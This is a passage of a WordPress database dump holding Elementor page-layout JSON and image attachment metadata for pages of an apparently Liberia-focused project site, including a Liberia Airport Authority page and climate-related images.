soon!\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1a78d5f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"532f56d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"f0efc77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1a13897\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a4db5a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"38bc81c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"17482a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ae03a19\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mogcsp\\\",\\\"tag_id\\\":\\\"64\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mogcsp\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7758e3b1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"766d660a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1a4a49d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a94bfb8\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mogcsp\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(22052,3211,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(22054,3211,'_thumbnail_id','3210'),(22055,3212,'_wp_attached_file','2020/02/homeowner-kids-puppy-argentina.jpg'),(22056,3212,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:42:\"2020/02/homeowner-kids-puppy-argentina.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:42:\"homeowner-kids-puppy-argentina-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:42:\"homeowner-kids-puppy-argentina-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:42:\"homeowner-kids-puppy-argentina-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(22057,2964,'_thumbnail_id','3212'),(22058,3213,'_wp_attached_file','2020/02/West-African-sunset-Liberia-1.jpg'),(22059,3213,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:41:\"2020/02/West-African-sunset-Liberia-1.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"West-African-sunset-Liberia-1-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"West-African-sunset-Liberia-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:41:\"West-African-sunset-Liberia-1-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(22060,3214,'_wp_attached_file','2019/11/CI.jpg'),(22061,3214,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:14:\"2019/11/CI.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"CI-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"CI-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"CI-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(22062,3215,'_wp_attached_file','2019/11/mot-1.jpg'),(22063,3215,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:17:\"2019/11/mot-1.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"mot-1-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"mot-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"mot-1-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(22065,3216,'_elementor_edit_mode','builder'),(22066,3216,'_elementor_template_type','wp-post'),(22067,3216,'_elementor_version','2.7.5'),(22068,3216,'_wp_page_template','default'),(22069,3216,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fee7624\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia Airport Authority Information coming up<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0cfc190\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"ef8085e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"197521f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1214e7c\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"laa\\\",\\\"tag_id\\\":\\\"55\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"laa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2241ab5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e6ea64b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4015db0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3742cd2\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:laa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(22070,3216,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(22072,3216,'_thumbnail_id','3215'),(22073,3217,'_wp_attached_file','2019/11/Liberias-Roberts-International-Airport.jpg'),(22074,3217,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:50:\"2019/11/Liberias-Roberts-International-Airport.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:50:\"Liberias-Roberts-International-Airport-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:50:\"Liberias-Roberts-International-Airport-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:50:\"Liberias-Roberts-International-Airport-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(22075,1596,'_thumbnail_id','3217'),(22076,3218,'_wp_attached_file','2019/11/climate-tech.png'),(22077,3218,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:24:\"2019/11/climate-tech.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"climate-tech-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"climate-tech-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"climate-tech-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(22078,483,'_thumbnail_id','3218'),(22079,3219,'_wp_attached_file','2019/11/climate-act.jpg'),(22080,3219,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:23:\"2019/11/climate-act.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"climate-act-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"climate-act-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"climate-act-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(22081,479,'_thumbnail_id','3219'),(22082,3220,'_wp_attached_file','2019/11/sub-humid.jpg'),(22083,3220,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:21:\"2019/11/sub-humid.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"sub-humid-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"sub-humid-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"sub-humid-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1: